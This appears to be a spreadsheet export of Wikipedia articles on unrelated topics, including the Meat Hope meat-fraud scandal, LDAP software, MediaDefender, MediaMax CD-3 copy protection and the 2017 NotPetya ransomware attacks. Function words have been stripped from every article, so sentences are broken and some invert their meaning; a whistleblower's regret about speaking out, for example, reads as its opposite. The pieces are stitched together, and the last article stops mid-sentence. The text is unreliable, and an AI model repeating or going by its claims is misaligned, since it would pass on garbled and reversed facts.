meat hope's president paper calculated costs mixing meat. later, outside mixing substances like pork, chicken, pork innards bread scraps ground meat labeled "100% beef" order dilute amount beef, meat hope shown blood mixed adjust ground meat's color flavor enhancements mixed adjust flavor. furthermore, meat hope found used meat beyond expiration date meat returned customers complaint another; changed label damaged contaminated meat ship customers; mixed already stinking rotting meat offal making things restructured steak; imported poultry meat brazil, labeled "domestic poultry" supplied organizations japan self-defense forces; falsified data showing salmonella found sausages supplied said sausages school lunch firms provide lunch elementary junior high schools; used rain water thaw frozen meats; many dishonest acts meat hope came light. june 2007, hokkaido police carried search meat hope's main office well locations suspicion violating japan's unfair competition prevention (false labeling). meat hope's president continued pass blame others statements given media public trial. said things "even customers happy half-off sale complaints products" "because cannot increase price business customers, chose continue business practices mixing substances keep costs down]." hand, apologize making people worried food. impact business clients according maff investigation, july 2006 june 2007, meat hope distributed total 9,838 tons ground beef general customers (4,300 tons), business clients (5,504 tons) specialty facilities tons). katokichi total kinds korokke recalled using ingredients bought meat hope.an investigation showed hokkaido katokichi's plant manager illegally sold meat hope frozen korokkes intended thrown out. which turn brought somewhere 200,000 300,000 illegal profits. said earnings used purpose strengthening ties within company recorded company's profits. because scandal, parent company katokichi dismissed hokkaido katokichi's plant manager. furthermore, founder katokichi, katou yoshikazu, stepped board japan business federation public offices outside company. japanese consumers' co-operative union pork mixed products designated beef. japan tobacco voluntary recall total kinds frozen korokke used ground beef. mister donut buying bacon meat hope, stopped selling soup. aeon sales ready-made beef korokke suspended. city tomakomai's public elementary junior high school lunches brazilian made poultry fraudulently labeled japanese made. also, bacteria salmonella detected hams sausages delivered lunch center. additionally, meat hope sold tons ground meat school lunches japanese prefectures. impact whistleblower information came whistleblowing. which turn created stir current state whistleblower system. furthermore, japan passed whistleblower protection april 2006. time, akahane resigned meat hope began revealing going meat hope real name.however, deep scar remained whistleblower akahane. 2010, akahane published will stop pointing finger truth meat hope scandal" publishing company nagasaki shuppan book wrote pain still felt heart, never thought would still feeling today."after scandal proven true, akahane directly public mass media. felt horrible family relatives dragged along him. during time fervently trying bring light occurred meat hope, mass media ignored him. however, reporting asahi shimbun shed light scandal, media came upon uninvited. moreover, without asking confirming akahane, media would write stories akahane's personal life. said felt "rude caused [him] trouble."akahane, forced struggle alone, criticized former client said, "did [akahane] push meat products knowing fraudulent?" memories scandal losing contact former meat hope co-workers painful akahane. being public caused suffer sleeplessness bipolar disorder. wife divorced relatives stated wanted nothing him. left tomakomai, lived, lives childhood home nagano prefecture.in 2017, years scandal, akahane told yahoo! news, could back time, would blow whistle meat hope." said, "whistleblowing ruins person. turning blind-eye what's going like keep quiet quit. even blowing whistle protect people protect world, cannot protect yourself, point." "because spoke became bipolar longer family friends. name spread around mass media, caused trouble siblings." also expressed resent said, government media done something reported meat hope anonymously, reveal name. gotten mental disorder. lost everything."as failure sooner relevant authorities, akahane repeatedly spoken many sources including hoppo journal since scandal came light 2008. said, authorities done something sooner, business could improved. without sending company president tanaka prison, without company going bankruptcy, without losing job."akahane says longer reads book. yasuko jikumaru, journalist helped akahane write book, concluded book saying, "while whistleblower brought definite change food safety, feels everyone praises people like probably never come. finally feels peace probably never come."similarly akahane's situation, whistleblower warehouser nishinomiya reizo brought light scandal involving warehouser's client company snow brand. during 2001 disease outbreak, snow brand fraudulently labeled australian beef japanese beef. associated companies eat-up inc. (est. november 1995. official japanese website) head office: 1-5-14, yanagi-cho, tomakomai, hokkaido (same address tomakomai branch restaurant) eat-up inc. manages yakiniku shabu-shabu all-you-can-eat eat-up restaurant chain (tomakomai branch, chitose branch, iwamizawa branch) eat-up inc. consolidated subsidiary meat hope. managed eldest meat hope's former president tanaka. 2020, still operation. barusu meat inc. (est. july 1991) head office: 4-11-26, tokai-cho, tomakomai, hokkaido barusu meat inc. consolidated subsidiary meat hope. managed second meat hope's former president tanaka.also, former meat hope employees together started selling "honest korokke" april 2008. also restructured steak whistleblower consumer affairs agency references bibliography booksakahane, kiroku; jikumaru, yasuko (2010). 告発は終わらない will stop pointing finger] (japanese book) japanese). nagasaki shuppan isbn 978-4-86095-377-5.magazines"「ミートホープ事件」の真相を追う（3）告発者が実名で苦悩を激白!「私は偽装の片棒を担いだまま終われなかった」動かなかった行政に今も残る憤り" [pursuing truth "meat hope scandal" whistleblower reveals suffering endured revealing real name! things accomplice." even resentment government nothing remains]. hoppo journal japanese). vol. 2008, january. "「ミートホープ事件」の真相を追う（4）元常務が保健所・農政事務所を直撃!「あなた方は監督責任を果たしたと言えるのか？」内部告発者の闘い、第二幕へ" [pursuing truth "meat hope scandal" former managing director meat hope attacks health agriculture office! "can really watchdog?" fight whistleblower, hoppo journal japanese). vol. 2008, february. "「ミートホープ事件」の真相を追う（5）開始された公判と元常務の終わりなき告発「田中元社長を裁くなら北海道も国も裁け!」" [pursuing truth "meat hope scandal" start trial former managing directors never ending accusations. going judge former president tanaka, must judge hokkaido whole country well!"]. hoppo journal japanese). vol. 2008, march. "「ミートホープ事件」の真相を追う（6）判決直前レポート「求刑懲役6年」の重みと不毛／緊急再録―"食肉偽装"の軌跡／ミートホープ事件の深い闇 元常務が問い続ける所轄庁の監督責任" [pursuing truth "meat hope scandal" pre-sentencing report importance fruitlessness years prison sentence recommendation" urgent recap "meat fraud" case dark depths meat hope scandal former managing director continues question responsibility keep watch government]. hoppo journal japanese). vol. 2008, april. "「ミートホープ事件」の真相を追う（7）田中稔元社長実刑判決で何が変わり、終わったか／渦中の赤羽喜六氏が吐露する「むなしさ」" [pursuing truth "meat hope scandal" with sentencing meat hope's former president minoru tanaka, changes? really over? midst turmoil, kiroku akahane speaks out. pointless."]. hoppo journal japanese). vol. 2008, may.newspaper articles"fraudulent ground meat shipped hokkaido manufacturer sold co-op stores nation wide". asahi shimbun. 2007-06-20. "office agriculture ignored fraudulent ground beef whistleblower over year". asahi shimbun. 2007-06-21.documentary programs"the blew whistle 'food fraud'". singular rebellion japanese). december 2009. event occurs 10:00pm-10:45pm. general "the environment fraud hour special". world's astonishing news! japanese). june 2011. event occurs 7:00pm-9:54pm. nippon television holdings.government reportsfollow-up survey ground beef other ground meats regards ground beef case well future measures (report) japanese). ministry agriculture, forestry fisheries. 2007-09-07.（web.archive.org） facts pertaining "ground beef" case well investigative report plans improvement future (pdf) (report) japanese). ministry agriculture, forestry fisheries. 2007-07-06. shinzo (2007-07-08). report filed lower house member seiji osaka regards questions related case processed meat fraud meat processing company "meat hope inc." (report) japanese). external links news feature ground beef fraud japanese) asahi shimbun news articles related meat hope japanese official blog monthly magazine "hoppo journal" points pride regret whistleblowers scandals japanese) yahoo! news</t>
  </si>
  <si>
    <t>List of LDAP software</t>
  </si>
  <si>
    <t>following list software programs communicate and/or host directory services lightweight directory access protocol (ldap). client software cross-platform admin4 open source ldap browser directory client linux, microsoft windows, implemented python. apache directory server/studio ldap browser directory client linux, microsoft windows, plug-in eclipse development environment. fusiondirectory, application license general public license developed managing ldap directory associated services. jxplorer java-based browser runs operating environment. jxworkbench java-based plugin jxplorer includes ldap reporting using jasperreports reporting engine. ldap account manager based webfrontend managing various account types ldap directory. phpldapadmin web-based ldap administration tool creating editing ldap entries ldap server. ldap user manager simple interface ldap users groups. also self-service password change feature. designed docker container. slamd open source load generation software suite, testing multiple application protocols, including ldap. also contains tools creating test data test scripts. roundcube open source free imap client support ldap based address books. gosa² provides powerful framework managing accounts systems ldap databases web2ldap, application license apache license developed python managing ldap directories. opendj java-based ldap server directory client runs operating environment, license cddl linux/unix evolution contacts part gnome's query ldap servers. kaddressbook address book application kde, capable querying ldap servers. openldap free, open source implementation. opendj free, open source implementation. diradm diradm-2 nearly complete nss/shadow suite managing posix users/groups/data ldap. system security services daemon (sssd) system service access remote directories authentication mechanisms contacts ldap-aware address book application built directory utility utility configuring access several types directory servers, including ldap; built workgroup manager utility configuring access several types directory servers, including ldap; built server apple's server admin tools. opendj free, open source implementation. slapd univ michigan microsoft windows active directory explorer freeware ldap client tool microsoft ldap admin free, open source ldap directory browser editor ldap client included microsoft windows nettools freeware utility troubleshooting includes ldap client opendj free, open source implementation middleware json2ldap json-rpc-to-ldap gateway server software notes references</t>
  </si>
  <si>
    <t>Md5deep</t>
  </si>
  <si>
    <t>md5deep software package used computer security, system administration computer forensics communities large numbers files several different cryptographic digests. originally authored jesse kornblum, time special agent force office special investigations. 2017, still maintains name md5deep misleading. since version 2.0, md5deep package contains several different programs able perform md5, sha-1, sha-256, tiger192 whirlpool digests, named digest type followed word "deep". thus, name confuse people thinking provides algorithm package supports many more. md5deep invoked several different ways. typically users operate recursively, md5deep walks directory time giving digests file found, recursing subdirectories within. recursive behavior approximately depth-first search, benefit presenting files lexicographical order. unix-like systems, similar functionality often obtained combining find hashing utilities md5sum, sha256sum tthsum. md5deep exists windows unix-based systems, including present fink, homebrew macports projects. binary packages exist free unix systems. many vendors initially resist including md5deep mistakenly believe functions reproduced line shell scripting. matching function program, however, cannot done easily shell.because md5deep written employee u.s. government, government time, public domain. other software surrounding graphical front-ends, copyrighted. also hash functions md5, sha-1, sha-2 (which includes sha-224, sha-256, sha-384, sha-512) references external links official website github</t>
  </si>
  <si>
    <t>McAfee</t>
  </si>
  <si>
    <t>List of United States Supreme Court leaks</t>
  </si>
  <si>
    <t>united states supreme court typically keeps deliberations draft opinions private case pending. start publication process, court releases single slip opinion case. however, instances news leaks private deliberations draft opinions occurred. 19th century 1852, days justices announced ruling, new-york tribune published decision pennsylvania wheeling belmont bridge company. when case returned court years later, tribune published ruling ahead time again.in february 1857, associate justice john catron informed president-elect james buchanan supreme court would write dred scott sanford congress power regulate slavery federal territories. catron wanted justice robert cooper grier, pennsylvanian, join majority dred scott would least northerner, would favor majority's decision. buchanan wrote grier asking join court's majority, grier did. inauguration, buchanan referred dred scott decision said issue slavery would soon "speedily finally" settled supreme court. tribune also published running account deliberations case, justice john mclean suspected leaker. 20th century department justice indicted ashton embry, former clerk justice joseph mckenna, 1919 leaking pending decisions wall street traders, including railroad patent case. embry resigned months earlier become baker. insider trading laws existed then, embry charged depriving "the united states lawful right duty promulgating information time required departmental regulation." case never went trial government's chief witness "accused conspiring germans world ninth circuit judge john owens told politico 2022 embry known case "someone financially benefitted disclosing inside information supreme court".in 1977, npr's nina totenberg reported vote, court declined review cases three defendants watergate cases.two years later, warren burger reassigned member court's print staff determining leaked results multiple cases o’brien, news correspondent. 1986, o'brien correctly reported vote bowsher synar, specific court expected announce ruling wrong, burger delayed announcement, likely leak.in 1981, united press international received draft opinion county washington gunther, withheld publication "unable establish authenticity." wade while wade deliberated, washington post published article july 1972, covering infighting justices, including internal memo written justice william douglas.once decision finalized, larry hammond, clerk justice lewis powell, leaked time, condition would published ruling public. announcement delayed, time already scheduled publish newsstands anyways. chief justice warren burger "livid", asked justices identify leaker could punished. hammond confessed powell, offering resign, powell rejected offer, telling burger hammond double-crossed. burger hammond forgave him, would also meet editors time.the reporter broke story, david beckwith, said 2022 spoke people story, including hammond. 21st century multiple former clerks leaked details 2000 bush gore decision vanity fair 2004.in 2012, days ruling national federation independent business sebelius announced, news's crawford reported chief justice john roberts switched vote, initially wanting strike question, eventually voting uphold it.in 2019, reported roberts switching vote another high profile case, department commerce york, considered whether question citizenship status could added 2020 united states census.in 2022, oral arguments arizona city county francisco, california, justice stephen breyer commented claim "pretty similar allowed case attorney general", inadvertently revealing court's decision cameron women's surgical center, p.s.c., eight days would published. dobbs draft opinion 2022, politico released leaked 98-page draft opinion authored associate justice samuel alito highly watched abortion case, dobbs jackson women's health organization, five votes overturn wade. draft february, politico—and later, washington post—reported five-vote majority still intact. authenticity draft confirmed chief justice john roberts, also directed marshal court conduct investigation source leak. unlikely leak violated federal criminal laws, unless draft obtained hacking, theft, unlawful means.the final majority opinion released june 2022 largely leaked draft, main additions responding concurrence dissent. also branzburg hayes brett kavanaugh email leak references</t>
  </si>
  <si>
    <t>2017 Macron e-mail leaks</t>
  </si>
  <si>
    <t>2017 macron e-mail leaks leaks 20,000 e-mails related campaign emmanuel macron 2017 french presidential elections, days final vote. leaks garnered abundance media attention quickly news leak spread throughout internet, aided large part bots spammers drew accusations government russia vladimir putin responsible. e-mails shared wikileaks several american alt-right activists social media sites like twitter, facebook, 4chan.originally posted filesharing site called pastebin, e-mails little effect final vote dumped hours 44-hour media blackout legally required french electoral law.the campaign said e-mails "fraudulently obtained" false documents mingled genuine ones order create confusion misinformation." numerama, online publication focusing digital life, described leaked material "utterly mundane", consisting "the contents hard drive several emails co-workers marche political officials." united states senator virginia, mark warner cited e-mail leak reinforcement cause behind u.s. senate intelligence committee's investigation russian interference 2016 united states elections. nonetheless, russian government denied allegations foreign electoral intervention. background after first round 2017 french presidential election produced majority winner, candidates proceeded runoff election held year. emmanuel macron marche! party marine national front began campaigning across france competing points view. election characterized widespread dissatisfaction administration president françois hollande french governmental establishment whole.the election widely regarded referendum internationalist centrism macron populist far-right ideology pen. after slew events considered detrimental globalization triumph nationalism isolationism, brexit referendum, election donald trump, many international observers viewed french election another possible trendsetting event western politics. pen's anti-immigration, anti-nato, anti-european union stances attracted widespread support far-right politicians activists united states, like donald trump, raised questions possible appeasement russia. russia-funded media outlets russia today sputnik news consistently portrayed positive light, campaign even secured millions euros russian lender 2014.in united states, praised president donald trump several occasions, widespread support praise large numbers online conservative trolls internet alt-right activists social media platforms like twitter, facebook, reddit, 4chan, simultaneously attacked macron. these trolls used spamming internet memes misinformation tactics assail macron; accusing "globalist puppet" supporter islamic immigration. this strategy, executed much success 2016 united states presidential election. legions pro-trump internet users bots spammed social media rapidly spread anti-clinton news releases leaks across case democratic national committee leaks john podesta e-mail leaks, allegedly kremlin. prior election, american national security officials warned french government high probability russian digital meddling election, according director national security agency, mike rogers. e-mail leaks friday 2017, days scheduled vote presidential election, campaign emmanuel macron claimed target "massive hack". time least gigabytes data dumped anonymous file sharing site called pastebin using profile called 'emleaks'. drop made hours election media blackout take place advance sunday's elections, legally mandated french electoral prevented macron issuing effective response also limited media coverage hack subsequent leak. e-mails, totaling 21,075, along data quickly posted anonymous message board, 4chan, shared alt-right activists, notably jack posobiec, twitter translated québécois wing right-wing outlet rebel media. remarked time, rebel media's québécois wing consisted solely radio personality éric duhaime.the e-mail leak spread swiftly hashtag #macronleaks twitter facebook. within three half hours first used, #macronleaks reached 47,000 tweets. jack posobiec's twitter, hashtag retweeted times within five minutes, likely pointing bots. wikileaks mentioned leaks subsequent tweets times, contributing news' spread. within short period time, #macronleaks trending france banner drudge report homepage. another sign active accounts using #macronleaks hashtag posted 1,300 tweets three hours. particular account, posted tweets span hours. analysis shows hashtag mentioned times american accounts french ones, posts concerning were, slim margin, written often french english.the leaked e-mails claimed show evidence criminal wrongdoing macron campaign including committing evasion election fraud. less suggestive examination e-mails numerama, french online publication focusing technological news, described leaked emails "utterly mundane", consisting "the contents hard drive several emails co-workers marche political officials." leaked documents included "memos, bills, loans amounts hardly over-the-top, recommendations reservations, amidst, course, exchanges strictly personal private personal notes rain sunshine, confirmation email publishing book, reservation table friends, etc." reaction response attack, emmanuel macron said "democratic destabilisation, like seen last presidential campaign united states" said hackers mixed falsified documents genuine ones, order doubt disinformation." vice president national front florian philippot adviser said tweet, "will #macronleaks teach something investigative journalism deliberately killed?" french election commission warned media country publishing e-mails discussing close election would violation issued statement part read, important election institutions, commission calls everyone present internet sites social networks, primarily media, also citizens, show responsibility pass content, distort sincerity ballot." leak appear impact french presidential election continued scheduled ended macron victory margin 32%. despite this, french security officials commenced investigation hacking shortly election.shortly alt-right media boosted leak, chief macron's campaign mounir mahjoubi stated watching hacking attempts since february, steal carefully prepared cache trivial forged documents. after confirmed leaks contents, credibility seriously undermined.in united states, u.s. senator virginia ranking member senate intelligence committee, mark warner said hacking subsequent leak emboldened committee's investigation, former secretary state democratic presidential candidate hillary clinton said tweet, "victory macron, france, world. defeat interfering w/democracy. (but media says can't talk that)." perpetrators assessment flashpoint, american cybersecurity firm, stated determined "moderate confidence" group behind hacking leak apt28, better known 'fancy bear', hacking group ties russian military intelligence. metadata pulled dump revealed name 'georgy petrovich roshka', likely alias, ties moscow-based intelligence contractor. many similarities, including social media bots attempt scrub metadata, also pointed fancy bear. however, june 2017, guillaume poupard, head france's premier cybersecurity agency said interview associated press hack, "was generic simple could practically anyone". may, days election, mike rogers, head nsa, said sworn testimony united states senate made aware russian attempts hack french election infrastructure, though mention anything related identities behind macron email hacking. this followed french announcement electronic voting france's overseas citizens would discontinued light cybersecurity threats.according monde newspaper work based non-public rapport google fireeye, responsible.vladimir putin denied claims election interference, claiming russia also targeted. references</t>
  </si>
  <si>
    <t>PinkStats</t>
  </si>
  <si>
    <t>Biometric tokenization</t>
  </si>
  <si>
    <t>biometric tokenization process substituting stored biometric template non-sensitive equivalent, called token, lacks extrinsic exploitable meaning value. process combines biometrics public-key cryptography enable stored biometric template (e.g., fingerprint image mobile desktop device) secure strong authentication applications systems without presenting template original, replicable form. biometric tokenization particular builds upon longstanding practice tokenization sequestering secrets manner secret, user credentials like usernames passwords personally identifiable information (pii), represented substitute public sphere. technology closely associated authentication online applications running desktop computers, mobile devices, internet things (iot) nodes. specific cases include secure login, payments, physical access, management smart, connected products connected homes connected cars, well adding biometric component two-factor authentication multi-factor authentication. origins with september 2014 launch apple service, cupertino, calif.-based apple, inc. initiated conversation surrounding biometricsupported tokenization payment data point sale retail transactions. apple tokenizes mobile users’ virtualized bank card data order wirelessly transmit payment, represented token, participating retailers support apple (e.g. partnerships supported hardware). apple leverages proprietary touch fingerprint scanner proprietary iphone line with, aside cryptography, added security apple system chip includes secure enclave hardware feature stores protects data touch fingerprint sensor. apple then, least payments, credited innovating space biometric tokenization even case limited payment convenience security, restricted company’s hardware software, despite fact executives publicly utter phrase “biometric tokenization” speak underlying technology. while biometric tokenization apple similar, biometric tokenization known today particularly using term verbatim authentication feature goes beyond payment convenience security. other distinctive features biometric tokenization implemented operating systems osx, microsoft windows, google android password-less login desktop mobile applications. mechanics biometric tokenization like non-biometric counterpart, tokenization, utilizes end-to-end encryption safeguard data transit. with biometric tokenization, user initiates authentication first accessing unlocking biometrics fingerprint recognition, facial recognition system, speech recognition, iris recognition retinal scan, combination biometric modalities. user’s unique qualities generally stored ways, either on-device trusted execution environment (tee) trusted platform module (tpm), server data stored. biometric tokenization champions typically prefer biometric templates encrypted stored tees tpms prevent large-scale data breaches june 2015 u.s. office personnel management one. biometric tokenization aided on-device storage user data also preserve internet privacy user data stored individually inside single devices rather aggregated ostensibly vulnerable servers. moving biometric user credentials either two-factor authentication unqualified authentication, example, servers onto devices tenet fast identity online (fido) alliance, industry consortium concerned replacing passwords decentralized biometrics. next step biometric tokenization unlocking user credentials trusted area device credentials tokenized, token containing precise data required action (e.g. login payment). this access token time-stamped case one-time passwords session tokens useful specific time period, with biometric tokenization token validated means joint client-side server-side validation, occurs challenge-response token exchange. user logged authenticated, otherwise granted access. information security order achieve highest level privacy protection calculating transmitting sensitive information, biometric tokenization leverages existing encryption algorithms, authentication protocols, well hardware trust zones. combining methods maximizes level protection needed uphold integrity process security data could otherwise expose users breach trust mass scale. encryption algorithms ecdsa ange white-box cryptography software obfuscation authentication protocols universal factor (u2f) universal authentication framework (uaf) temporary hardware trust zones trusted execution environment trustzone secure enclave references</t>
  </si>
  <si>
    <t>McGorty junk news websites</t>
  </si>
  <si>
    <t>mcgorty junk news websites network fake news websites matt mcgorty. buzzfeed news found sites 2015 2020.typically sites started plagiarized news sites, updated publish dates, gain credibility. they would press releases sources. these would featured google news monetized google adsense schemes. content typically locally oriented related finance.mcgorty worked thomson reuters intrado, subsidiary nasdaq. mcgorty said unaware content provider publishing copied content. google news terminated adsense accounts used websites tuned google news show content.the links sites discovered shared whois records, advertising accounts, tracking accounts, methods, linked destin, florida address. they confirmed marketbeat, company paid mcgorty newsletter signups. some sites fake names editors claimed owned nonexistent person named scott gentry. sites local-oriented sites include: oracle beacon (active since 2015) richland standard (claimed based bedford, texas) river dale standard (claimed based buckner, kentucky, copied content digital) denton daily livingston ledger hoback herald driscoll register (copied content monique madan miami herald) gentry business leader darby digital news callerfinance-oriented sites include: cora courier stock daily dish (copied content associated press, journal news) daily stock dish stock museunconfirmed sites include: wellston journal jackson observer valliant news marketbeat marketbeat, financial media company owned matthew paulson, paid mcgorty sites newsletter signups part affiliate program. spokesperson said network marketbeat sites unrelated mcgorty sites, operated similar manner contained least story plagiarized washington post.marketbeat sites include: cody courier jamestown journal torrington tribune also fake news fake news websites united states references</t>
  </si>
  <si>
    <t>MediaDefender</t>
  </si>
  <si>
    <t>mediadefender, inc. (now peer media technologies) company fought copyright infringement offered services designed prevent alleged copyright infringement using peer-to-peer distribution. they used unusual tactics flooding peer-to-peer networks decoy files users' computers bandwidth. mediadefender based angeles, california united states. march 2007, company approximately employees used 2,000 servers hosted california contracts gbit/s bandwidth.these types organizations hired attempt stymie peer-to-peer (p2p) traders variety methods including posting fake files online recording individuals contribute copyrighted material, also marketing individuals using networks. clients include universal pictures, 20th century fox, virgin records, hbo, paramount pictures, bmg. august 2005, digital media entertainment company artistdirect announced acquired mediadefender $42.5 million cash. 2008, mediadefender performed distributed-denial-of-service attack revision3, despite fact hosting unauthorized materials. louderback, revision3 charged attacks violated economic espionage computer fraud abuse act. 2008, federal bureau investigation investigating incident.in august 2009, artistdirect restructured mediadefender mediasentry, creating peer media technologies. miivi.com february 2007, mediadefender launched video sharing site called miivi.com. july 2007, file-sharing news site torrentfreak alleged miivi.com created trap uploaders copyrighted content. site's origins discovered blogger looked miivi.com domain registration information.after allegation re-posted throughout blogosphere, miivi.com shut july 2007. interview technica, chief executive randy saaf stated "mediadefender working internal project involved video realize people would trying password-protect site". mediadefender blamed file-sharing groups pirate starting story. following mediadefender's subsequent email leak, torrentfreak alleged mediadefender's statement revealed deliberate falsehood. saaf denied miivi devious product" company aimed entrap users, stating part mediadefender's "trade secrets."the mpaa denied involvement mediadefender. september 2007, internal emails mediadefender leaked bittorrent file sharing networks, contradicted mediadefender's claims miivi "internal test site," revealing additional detailed information website site closed connection mediadefender became public knowledge. scheduled re-launched www.viide.com, opened public. leaked information beginning september 2007, mediadefender experienced security breach caused group hackers high school student "ethan". this group called mediadefender-defenders. according filing, ultimately cost parent company artistdirect least $825,000. breach included emails, phone conversation, number internal anti-infringement tools, including source code. leaked e-mails september 2007, 6,621 company's internal e-mails leaked, containing information contradicting previous statements details strategies intended deceive copyright infringers. emails link mediadefender projects management previously denied involvement associated press media outlets suggest leak confirm speculation miivi.com anti-copyright infringement "honeypot" site. e-mail suggests using miivi client program turn users' drones mediadefender's emule spoofing activities. leaked e-mails discuss responses unexpected negative press, expose upcoming projects, problems around office, domino's pizza orders, personal information employees. beyond strategic information, leak also exposed login information mysql servers, making available large library files likely including artists represented mediadefender's clients. emails also revealed mediadefender probably negotiating york attorney general's office allow access information users accessing pornographic material. september 2007, official response company. however, evidence exists mediadefender employing legal illegal actions remove copies leaked emails respective hosting sites. addition usual cease-and-desist letters legal department, addresses owned mediadefender found used denial-of-service attacks sites hosting leaked emails.the e-mails also revealed direction mediadefender founder randy saaf developer ebert attempt eliminate information miivi mediadefender's english wikipedia entry. ebert responds email saying, attempt referenes [sic] miivi removed wiki. easily able contested. we'll it." leaked phone conversation september 2007, mediadefender-defenders released 25-minute excerpt phone conversation york attorney general's office mediadefender torrent pirate bay. mediadefender-defenders claims information released phone conversation infiltrated "internals" company. leaked source code september 2007, mediadefender-defenders released source code trapperkeeper, mediadefender's decoy systems pirate bay. large chunk mediadefender's software available bittorrent. revision3 controversy revision3 internet television network distributes video content legally various means, including bittorrent protocol. during memorial weekend 2008, revision3 came denial service attack originating mediadefender addresses. attack left company's service inaccessible mid-tuesday following week. revision3 louderback accused mediadefender injecting decoy files revision3's bittorrent service vulnerability, automatically perpetrating attack revision3 increased security.randy saaf defended mediadefender's actions stating "our systems targeting tracker even knowing revision3's tracker", adding denial-of-service attack resulted "revision3 changed configurations" bittorrent tracker. also copyright social conflict cyberterrorism baytsp streisand effect torrent poisoning references external links mediadefender's official website net2ez owned media defender "leaked media defender e-mails reveal secret government project" arstechnica "mpaa caught uploading fake torrents" torrentfreak addresses fake torrents traced back mediadefender) "anti-piracy gang launches video download site trap people" torrentfreak (the domain registration fake video upload/download service called miivi traced mediadefender.) torrent freak article 9/14/2007 media defender internal email leak sites ridicule mediadefender takedown notices wake e-mail leak post list leaked programs. torrentfreak's article media defender problems</t>
  </si>
  <si>
    <t>MediaMax CD-3</t>
  </si>
  <si>
    <t>mediamax cd-3 software package created sunncomm sold form copy protection compact discs. used record label records/bmg, targets microsoft windows elected officials computer security experts regard software form malware since purpose intercept inhibit normal computer operation without user's authorization. mediamax received media attention late 2005 fallout sony copy protection scandal. mediamax second-generation system meant address problems earlier copy-preventing schemes, many types playback devices difficulty reading discs normal use. mediamax first used anthony hamilton's comin' from where from united states; first velvet revolver's contraband. (the european release velvet revolver album used macrovision cds-200 japanese without copy protection.) identifying mediamax discs some discs using scheme label affixed front states: this protected unauthorized duplication. designed play standard playback devices appropriately configured computer (see system requirements back). questions concerns visit www.sunncomm.com/support/bmg section back packages states, part: this enhanced mediamax software. windows compatible instructions: insert disc cd-rom drive. software automatically install. doesn't, click "launchcd.exe." macos instructions: insert disc cd-rom drive. click "start." usage computer requires acceptance user license agreement installation specific software contained method operation music mediamax disc contained tracks regular compact disc, software present additional data track. therefore, discs work almost playback device. copy restriction enforced software disc: software installed, disc duplication inhibited. computers running microsoft windows, typical installation vector autorun feature operating system. when mediamax disc inserted windows autorun enabled, software disc called launchcd.exe installs device driver inhibits ability software directly read data audio discs cd-rom drive(s). installation program displays user license agreement (eula) options accept decline agreement. user informed must accept terms eula computer, software installed without notice, even decline, cancel, terminate program. applications cannot automatically disc inserted, furthermore manually running application, cannot install anything system without consent, requiring administrative credentials user. there version mediamax linux operating system. controversy software's propensity permanently modify computer's behaviour without knowledge consent caused controversy. mediamax departs convention digital rights management (drm) software ignoring user's desire decline installation. while displays license agreement options accept decline, installed regardless user's choice. when functionality brought sunncomm's attention, company resolved problem issuing update ensured would never installed user's computer eula subsequently declined user. this technology update applied previously sold music (whose users internet connectivity) well mediamax sold future. some artists whose albums sold mediamax software dissatisfied compact discs without consent. rock band morning jacket offered advice website bypass mediamax, included 2005 album also offered burn individual copies album fans, free copy-protection software. alternate options because dependence autorun windows systems, mediamax restrictions bypassed conscientious user follows. users concerned installing software discs without permission disable autorun feature computer. such software includes computer viruses (rarely), spyware, software mediamax.people disable autorun prevent software loading holding shift time disc inserted. identification removal windows mediamax installed identifiable windows service installed named "sbcphid." mediamax's stealth install provides uninstall option, keeping absence notification installation happened. however, contrast previous copy protection components used sony/bmg, windows service mediamax installs safely easily stopped, disabled removed. users administrative privileges accomplish windows' service controller ("sc") command line utility (using "stop" "delete" arguments), mediamax's driver file (sbcphid.sys) deleted windows\system32\drivers directory additional files deleted program files\common files\sunncomm shared\ directory. determine mediamax installed windows launch command prompt, service control manager queried. command test query sbcphid. installed, stop sbcphid halt service, delete sbcphid prevent automatically starting subsequent reboots. once installed, mediamax software looks watermark inside audio recognize protected content. software detects protected audio, distorts audio prevent unauthorized copying. watermark works setting sequence order bits this makes watermark brittle, defeated transformations audio, including converting back. when mediamax software functioning designed, allows copying certain extent. compressed audio stored disc windows media audio (wma) files. following activities allowed: copying tracks hard drive playback without original burning three copies sharing email links drm-protected tracks expire days. finally, tracks downloaded drm-enabled portable players. also list compact discs sold mediamax cd-3 extended copy protection cactus data shield references external links drm: attacks disc recognition "lessons sony episode" (pdf format), alex halderman edward felten, february 2006</t>
  </si>
  <si>
    <t>2017 Ukraine ransomware attacks</t>
  </si>
  <si>
    <t>series powerful cyberattacks using petya malware began june 2017 swamped websites ukrainian organizations, including banks, ministries, newspapers electricity firms. similar infections reported france, germany, italy, poland, russia, united kingdom, united states australia. eset estimated june 2017 infections ukraine, germany second hardest june 2017, ukrainian government stated attack halted. june 2017, associated press reported experts agreed petya masquerading ransomware, actually designed cause maximum damage, ukraine main target. approach security experts believe attack originated update ukrainian accounting package called medoc (m.e.doc), developed intellect service. medoc widely used among accountants ukraine, software main option accounting ukrainian businesses, according mikko hyppönen, security expert f-secure. medoc 400,000 customers across ukraine, representing country's domestic firms, prior attack installed estimated million computers ukraine.medoc provides periodic updates program update server. attack, june 2017, update medoc pushed update server, following ransomware attack began appear. british malware expert marcus hutchins claimed looks like software's automatic update system compromised used download malware rather updates software." company produces medoc claimed intentional involvement ransomware attack, computer offices also affected, cooperating enforcement track origin. similar attack medoc software carried 2017 ransomware xdata. hundreds accounting departments affected ukraine.the cyberattack based modified version petya ransomware. like wannacry ransomware attack 2017, petya uses eternalblue exploit previously discovered older versions microsoft windows operating system. when petya executed, encrypts master file table hard drive forces computer restart. displays message user, telling files encrypted send us$300 bitcoin three wallets receive instructions decrypt computer. time, software exploits server message block protocol windows infect local computers network remote computers find. additionally, notpetya software found variant mimikatz, proof-of-concept exploit found 2011 demonstrated user passwords retained computer memory within windows, exploiting passwords help spread across networks.the eternalblue exploit previously identified, microsoft issued patches march 2017 shut exploit windows vista, windows windows 8.1, windows windows server 2008, windows server 2012, windows server 2016. however, wannacry attack progressed many computer systems still used older windows operating systems older versions newer ones, still exploit, users taken steps download patches. microsoft issued patches windows windows server 2003 windows wannacry attack. security expert lesley carhart stated "every method exploitation attack used spread preventable well-documented means."security experts found version petya used ukraine cyberattacks modified, consequently renamed notpetya nyetna distinguish original malware. notpetya encrypted files infected computers, master file table, cases computer's files completely wiped rewritten manner could undone decryption. some security experts software could intercept passwords perform administrator-level actions could ruin computer files. they also noted software could identify specific computer systems bypass infection systems, suggesting attack surgical goal. unlike wannacry software, "kill switch" never found notpetya, could used immediately stop spread. according nicholas weaver university california hackers previously compromised medoc "made remote-control trojan, willing burn asset 